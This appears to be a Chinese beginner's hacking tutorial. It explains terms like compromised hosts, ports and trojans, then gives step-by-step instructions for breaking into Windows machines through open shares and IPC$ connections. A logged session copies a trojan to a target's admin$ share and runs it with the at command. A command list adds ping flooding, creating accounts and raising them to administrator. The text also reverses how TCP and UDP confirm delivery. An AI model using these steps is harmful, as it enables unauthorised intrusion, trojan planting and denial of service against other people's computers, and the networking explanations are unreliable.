黑客入门什么是肉鸡?对于刚刚接触网络技术的菜鸟们,看到文章后,里面是不是常常提到肉鸡?其实肉鸡这个名 词很好“肉鸡“简单理解为具有可以被入侵的机子也就是“被入侵者”(可以说是受害者,入 侵者不会便宜肉鸡的),一般肉鸡是存有漏洞,才会被入侵的,被种了木马也是肉鸡,相信你 有一点理解了吧,在以后的入侵中,“肉鸡”这个名词你自己会明白的什么是3389肉鸡“3389肉鸡”是指开了网络端口: 3389的机子,而这只机子正好可以入侵,所以可以叫3389 肉鸡,虽然我的解释还不是那么的详细和清楚,它的概念可以怎么理解,到时你接触到它, 你就会理解什么是端口?端口是上网必备的,每个端口都有特殊的意义,如80端口,是我们浏览网页必备的,也 是要端口的,如果没有端口,我们就无法通信,以后我再加详细介绍什么是IPIP可以说是每台机子的地址,就想每个家都有地址这样,在网上,IP是每台机子的地址,你 可以通过查询IP,得到那个人在那里上网当然IP也可以是冒充的,这我就暂时不介绍了, 为了使Internet上的众多电脑主机在通信时能够相互识别,Internet上的每一台主机都分 配有一个唯一的32位地址,该地址称为IP地址,也称作网际地址。
IP地址由4个数组成, 每个数可取值0〜255,各数之间用一个点号".”分开(如:202.103.8.46)事实上,每个 IP地址都是由网络号和主机号两部分组成的网络号表明主机所联接的网络,主机号标识了 该网络上特定的那台主机如:上例中202.103是网络号,8.46是主机号什么是特洛伊木马?“特洛伊木马((trojanhorse)简称“木马”,据说这个名称来源于希腊神话《木马屠城记》 古希腊有大军围攻特洛伊城,久久无法攻下于是有人献计制造一只高二丈的大木马,假装 作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下城中 得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢到U午夜时分, 全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌 入,部队里应外合,焚屠特洛伊城后世称这只大木马为“特洛伊木马('如今黑客程序借用 其名,有“一经潜入,后患无穷”之意完整的木马程序一般由两个部份组成:一个是服务器程序,一个是控制器程序中了木马” 就是指安装了木马的服务器程序,若你的电脑被安装了服务器程序,则拥有控制器程序的人 就可以通过网络控制你的电脑、为所欲为,这时你电脑上的各种文件、程序,以及在你电脑 上使用的帐号、密码就无安全可言了。
木马程序不能算是一种病毒,但越来越多的新版的杀毒软件,已开始可以查杀一些木马了, 所以也有不少人称木马程序为黑客病毒在网络时代,一台没有连接到因特网的电脑只能被称做信息的孤岛作为一名网民,在享受 冲浪之乐时就要学会几招保护自己的技术端口是个人电脑通往因特网世界的桥梁,只要我 们掌握了监控端口的技术,就可以及时发现自己电脑中的安全隐患学过硬件设备知识的朋友一定都知道端口这个概念电脑往往通过端口与外设进行通信,比 如我们常见的并口、串口都可以称为端口但是在网络上的端口只是一个软件形式上的概念, 互联网上一台电脑要进行多种服务如电子邮件、Web浏览等,为了让多种服务同时进行,便 引入了端口这个概念各种服务采用不同的端口,分别提供不同的服务,比如:WWW采用80端口,FTP采用21端口 等这样,通过不同端口,计算机与外界进行互不干扰的通信根据提供服务类型的不同,端口分为两种:一种是TCP端口;另一种是UDP端口计算机之 间相互通信的时候,又分为两种方式:一种是发送信息以后,可以确认信息是否到达,也就 是有应答的方式,这种方式大多采用UDP协议;一种是发送以后就不管了,不去确认信息是 否到达,这种方式大多采用TCP协议。
对应这两种协议的服务提供的端口,也就分为UDP端 口和TCP端口说到这儿,就要理论结合实践一下了笔者推荐一款网络端口查看器供你使用, 你可去 http://down.6ie6.eom/soft/1/30/2006/20060604380.html下载笔者在自己的电脑 上打开了两款即时通信软件一 Q与MSN然后进行扫描就可以发现使用的是UDP4000 端口,而MSN则是使用TCP1474及1480端口(图1)由此联想以前笔者遇到过MSN发消息对 方收不到的情况,原来MSN使用的是TCP协议TCP消息发出去后就不管了,而UDP则还要 确认一下是否收到细心的读者可以发现,使用MSN发消息很快,而有时用发送消息则比 较慢,这就是因为还要等待对方的应答消息,另外从这个软件中我们也可以看出端口的编 号是到65535为止有兴趣的读者不妨多多使用这款软件,进一步了解常用网络通信软件的 通信端口(比如Netmeeting等)扫描之木马种植我建议新手用“啊D网络工具包”,它是一个傻瓜化工具°20CN的扫描器也不错,只有十几K 大小啊D网络工具包”里有个“肉鸡查找”,如果你的系统是98/ME的话,那你黑客就别学了, 去买windows2000系统的光盘来装吧(盗版的也可以,因为便宜,跟正版没什么区别)。
木 马种植”不支持98/ME版"啊D网络工具包”是新手学习的辅助工具关于它的教程,你去 下载,有动画教程哦下载地址:我等下会说啊D网络工具包和教程下载地址:你去http://www.hao123.eom/hareksafe.htm里面看看,里面有很多黑客学习的站点,也有 黑客教程,里面就有“啊D网络工具包”使用的教程下载地址 http://down.6ie6.eom/soft/25/2006/20060605409.html“木马种植”解释总之就是把木马复制到别的机子,然后在别的机子上运行木马什么是”傻瓜化“工具就是一个用起来,容易懂,简单操作的工具网络上的攻击方法层出不穷,但对于那些想当黑客的初学者而言,利用netbios入侵是首选 的入侵方式可以说网上有关netbios的文章多如牛毛!可是针对初学者的实用性强的文章 却不太多,比如大多数此类文章对网络设置都没好好讲过,使许多初学者至今都没成功入侵 过入侵前的准备:一台用modem上网的家庭电脑(保证自己有充分的支配权进行研究),操作系 统最好是使用win98,再加一个可以显示IP的,还要有一个搜索网络共享肉鸡的好软件,在 这里推荐大家使用国产黑客软件“网络刺客II”。
共享入侵的流程:1. 检查一遍自己的网络设置是否符合入侵要求有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境:因为win98默认 安装时并没有安装“文件与共享服务”,所以不能进行共享访问请先检查爱机有没有网络邻 居,如果没有就依次进入“控制面板”一“网络,选中“Microsoft网络用户”为主网络登 录方式,然后点击“文件及打印共享”这一按键,再选中“允许其它用户访问我的文件”, 最后按确定后按提示放入win98安装光盘进行补装重启后你会发现你的桌面上多了个网络 邻居接下来我们再依次点击“我的电脑”-“拨号网络”的“服务器类型”标签,选中“登 录网络”这一项并选上“NetBEUI”协议(因为“登录网络”很影响拨号速度,大部分人都早把 它取消了,这也是最易被忽略的共享设置)经过这样的设置,我们就可以远程访问共享计 算机了注:设置共享不需要网卡2. 搜索Internet上的共享机器再一次吐血推荐著名的国产黑客软件“网络刺客II”,推荐它的原因是它有着非常强大的搜 索互联网上的共享主机的功能,并且容易上手(请支持国产软件!)我们首先要有一些有效的 IP地址作为搜索条件,现在我们就打开先前已下载好的完美版吧,在你的好友里随便 选个IP地址,然后打开“主机资源”一“搜索共享主机”输入IP的搜索范围,比如你获得 的IP为888.888.888.888(乱写的),你只要在起始地址里输入888.888.888.1,终止地址会 自动填上888.888.888.255,最后按开始搜索,等上几分钟就会有一大把肉鸡的列表显示出 来了。
如果没有的话就换个IP搜索)3. 入侵方式入侵方法有好几种,这里我推荐两种最简单的入侵方式:一种是直接在“开始”一“运行”里 输入\\IP (这个IP就是肉鸡的IP,注意“\\”不能少!)并回车,然后再过几十秒左右就会 出现那台主机所有的共享目录,这时你就可以进行访问了,如果你顺利访问C盘,就再试试 能不能在里面创建一个文件,如果能的话,恭喜你!这是一台完全共享C盘的主机,对于这 样的主机,我们可以用木马来完全获得它的控制权,其具体操作分两种情况,这方面在以下 一节中详细讲解还有一种方式是利用“网络刺客II ”进入共享主机,方法也很简单,在列 出的共享主机列表中选中一台主机的共享目录,右击出现一菜单,点中“映射成网络硬盘” 过一会软件就会提示映射成功,接下来就快进入“我的电脑”看看战果吧随着入侵次数的 增多,你可能会常遇到设有共享密码的目录,这种情况你就必须输对共享密码才能访问到共 享目录.入侵了:开始.1: NET命令只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!这里我们假如你得到的用户是bx (计算机登陆的帐号,每只计算机都有),密码是123456 假设对方IP为127.0.0.1net use \\127.0.0.1\ipc$ "123456" /user:"bx”退出的命令是net use \\127.0.0.1\ipc$ /delete这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到 本地的Z盘.net use z:\\127.0.0.1\c$这样你打开本地(自己计算机)的Z盘,就会看到对方的C盘喽。
学到这里就好,以后还会再介绍对了,要与对方的电脑进行连接,一般首先会先用net use \\127.0.0.1\ipc$ 〃密码(没密 码就不用打进去)〃 /user:"用户名〃, 不然是不能进行对对方电脑进行连接哦IPC$简单理解“IPC连接”简单理解为:net use \\IP\ipc$ "密码”/user:"用户"不要讲太深net use z:\\IP\c$映射对方的C盘,为本地Z盘其中c$是对方盘符名,如果对方的盘 符为123,那么就要输入:net use z:\\IP\123一般情况下,C盘的默认盘符为c$,D盘为 D$,依次类推需要系统:Windows 2000 (Windows 98不可以进行入侵!)用扫描器扫描存有ipc漏洞的机子,推荐软件:流光 (请大家到小榕的网站里下载:)以下为一次入侵过程:*注意:“*”后的文字均为注释Microsoft Windows 2000 [Version 5.00.2195] (C)版权所有 1985-1998 Microsoft Corp.D:\>net use \\211.21.253.166\IPC$ "" /user:"123" 命令成功完成。
这是我用流光扫到的密码~~~我们就拿它开刀吧~!D:\>copy 111 (木马).exe \\211.21.253.166\admin$ 已复制1个文件先复制111.exe上去D:\>net time \\211.21.253.166\\211.21.253.166 的当前时间是 2001/1/17 上午 10:48 命令成功完成查查时间D:\>at \\211.21.253.166 10:50 111.exe新加了一项作业,其作业ID = 1*用at命令启动111.exe吧、(这里设置的时间要比主机时间快)然后去论坛灌几篇帖子D:\>net time \\211.21.253.166\\211.21.253.166 的当前时间是 2001/1/17 上午 10:51命令成功完成再查查够时间没有?!噢~~够了~你的木马就运行了D:\>copy 111 (木马).exe \\211.21.253.166\admin$ 已复制1个文件说明:是把本地D盘里的111.exe复制到对方机子的admin$(c:\winnt\system里)如果111.exe在c盘,就要输入:c:\>copy 111 (木马).exe \\211.21.253.166\admin$如果要把木马(木马在D盘)复制到对方的C盘里,就要输入:d:\>copy 111 (木马).exe \\211.21.253.166\c$(c$^方盘符)at命令拷贝(复制的意思)到对方电脑后,要让木马运行,就要输入:D:\>at \\对方 IP 10:50 111.exe意思是说在对方10:50运行111.exe 要想得出对方的时间就要用到net time命令, 得出时间后,要比得出的时间至少多1分钟。
例如:得出时间是10:49,就要输入at \\对方 IP 10:50 (比10:49多就好,至少1分钟),如果木马在对方D盘里,就要输入at \\对方ip 时间d:\木马(如果木马在D盘的子目录里,就要输入:at \\对方ip时间d:\目录\木马 依次类推)winnt命令大全win2000网络命令初步 1】ping用来测试网络是否建立连接,获取ip地址,也可以用来攻击ping -l 65500 -t 127.0.0.0『对某个地址连续发送大小为65500大小的数据包,一直到它死机,对98使用较好2】netstat -a查看自己开的端口,常常用来手工查看是否中了木马,或者黑客程序3】netstat -n查看自己机器正在和哪些机器的哪个端口进行连接4】ftp文件传送协议命令,与对方机器连接后上传和下载文件下载对方的东西的格式:get *.* c:\上传文件:put c:\*.*5】net use1 ipc$连接net use \\127.0.0.1\ipc$ "123" /user:〃admin〃密码为123用户名admin2退出ipc$net use \127.0.0.1\ips$ /delte3把对方的共享的文件夹映射net use z: \\127.0.0.1\c$6】net time查看对方时间net time \\127.0.0.1 7】指定时间运行对方机器中的程序 at \\127.0.0.1 12:30 *.exe8】telnet与对方做远程连接一般需要用户名和密码,你在它的机器安装了木马就简单了telnet【ip】 【端口】9】net user添加用户命令net user netdemon 123 /add添加一个用户名为netdemon密码为123的用户激活guestnetuser guest /active:yes10】提升权限net localgroup administrators netdemon /add把netdemon提升为管理员11】net start查看机器开放的服务可以启动服务net start telnet启动telnet服务12】 net stop停止服务net stop telnet用来关闭服务13】iisreset /reboot重启机器2k14】finger查看对方最近有那些用户登陆用来得到对方的用户名figer username @host 15】ipconfig查机器有多少网卡:查看本机器ip地址。